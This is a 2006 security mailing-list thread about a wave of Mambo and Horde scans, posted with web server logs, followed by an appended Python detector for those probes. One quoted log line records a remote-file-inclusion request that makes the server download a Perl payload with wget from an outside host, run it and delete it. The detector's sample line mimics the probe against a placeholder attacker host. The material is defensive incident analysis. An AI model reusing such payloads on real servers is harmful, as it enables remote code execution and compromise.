Incidents
High volume of Mambo scans May 13 2006 01:36PM
Daniel Cid (danielcid yahoo com br) (4 replies)
Re: High volume of Mambo scans May 15 2006 03:01AM
Karl Schlitt (karl dakota-st com)
On Sat, 13 May 2006, Daniel Cid wrote:

> Since Thursday night I'm seeing a high volume of scans
> on different web servers for possibly the following
> vulns:
>
> http://secunia.com/advisories/14337/
> http://www.osvdb.org/displayvuln.php?osvdb_id=10180
>
>
> However, they say the problem is on function.php and
> I'm seeing them on index.php. Can anyone confirm that?
>
> Some log samples:
>
> 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET

We are seeing horde attempts here.

222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /horde-3.0.9//README HTTP/1.1" 404 806
222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /horde-3.0.9//README HTTP/1.1" 404 806
222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /Horde//README HTTP/1.1" 404 806
222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /Horde//README HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:21 -0500] "GET //README HTTP/1.1" 403 791
204.11.239.43 - - [13/May/2006:13:28:21 -0500] "GET /horde//README HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:21 -0500] "GET /horde2//README HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:22 -0500] "GET /horde3//README HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:22 -0500] "GET /horde-3.0.9//README HTTP/1.1" 404 806
204.11.239.43 - - [13/May/2006:13:28:22 -0500] "GET /Horde//README HTTP/1.1" 404 806

Interestingly, putting a zero length file (link to /dev/zero here)
"/a1b2c3d4e5f6g7h8i9/nonexistentfile.php" seems to stop
them dead... Gotta wonder about the error checking in the 'spoit ;)

--
Karl Schlitt
karl (at) dakota-st (dot) com [email concealed]

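An added detection example, not part of the thread: it parses Apache access-log lines like the ones posted above and flags the two scan patterns discussed, a `mosConfig_absolute_path` value pointing at a remote URL (the Mambo remote-include probe Daniel quoted) and bursts of `README` requests under horde-style directories (the fingerprinting Karl saw). The sample lines, IPs and hostnames are constructed, and the per-IP threshold is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlparse

# Constructed sample lines modeled on the thread's excerpts; IPs and hosts are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://attacker.example/cmd.txt?&cmd=cd%20/tmp HTTP/1.0" 404 167 "-" "Mozilla/5.0"
198.51.100.7 - - [12/May/2006:23:59:11 -0500] "GET /horde-3.0.9//README HTTP/1.1" 404 806 "-" "-"
198.51.100.7 - - [12/May/2006:23:59:11 -0500] "GET /Horde//README HTTP/1.1" 404 806 "-" "-"
198.51.100.7 - - [12/May/2006:23:59:12 -0500] "GET /horde2//README HTTP/1.1" 404 806 "-" "-"
203.0.113.5 - - [13/May/2006:10:00:00 -0500] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Common/combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
README_PROBE_THRESHOLD = 3  # assumption: this many README probes from one IP is a scanner

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_mambo_rfi(path):
    """True when mosConfig_absolute_path carries a remote URL, i.e. the remote-include probe."""
    query = urlparse(unquote(path)).query
    for pair in query.split('&'):          # manual split: parse_qs would choke on the ';' payloads
        key, _, value = pair.partition('=')
        if key == 'mosConfig_absolute_path' and value.lower().startswith(('http://', 'https://', 'ftp://')):
            return True
    return False

def is_horde_readme_probe(path):
    """README requests at the web root or under a horde* directory (version fingerprinting)."""
    return re.match(r'^/+(horde[^/]*/+)?readme$', path, re.IGNORECASE) is not None

def analyze(log_text):
    """Return RFI hits as (ip, path, status) and IPs whose README probes reach the threshold."""
    rfi_hits, readme_counts = [], defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        if is_mambo_rfi(rec['path']):
            rfi_hits.append((rec['ip'], rec['path'], rec['status']))  # status kept: scanners ignore 404s
        elif is_horde_readme_probe(rec['path']):
            readme_counts[rec['ip']] += 1
    scanners = {ip: n for ip, n in readme_counts.items() if n >= README_PROBE_THRESHOLD}
    return {'rfi': rfi_hits, 'readme_scanners': scanners}

if __name__ == '__main__':
    for kind, hits in analyze(SAMPLE_LOG).items():
        print(kind, hits)
```

Feed real access logs through `analyze()` and the result lists the source IPs worth blocking or watching, while the status column shows the probes still fire even when the path is a 404.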
Re: High volume of Mambo scans May 15 2006 12:24AM
George A. Theall (theall tifaware com)
Re: High volume of Mambo scans May 14 2006 11:43PM
Peter Kosinar (goober ksp sk)
Re: High volume of Mambo scans May 14 2006 10:57PM
Jamie Riden (jamesr europe com)
Copyright 2010, SecurityFocus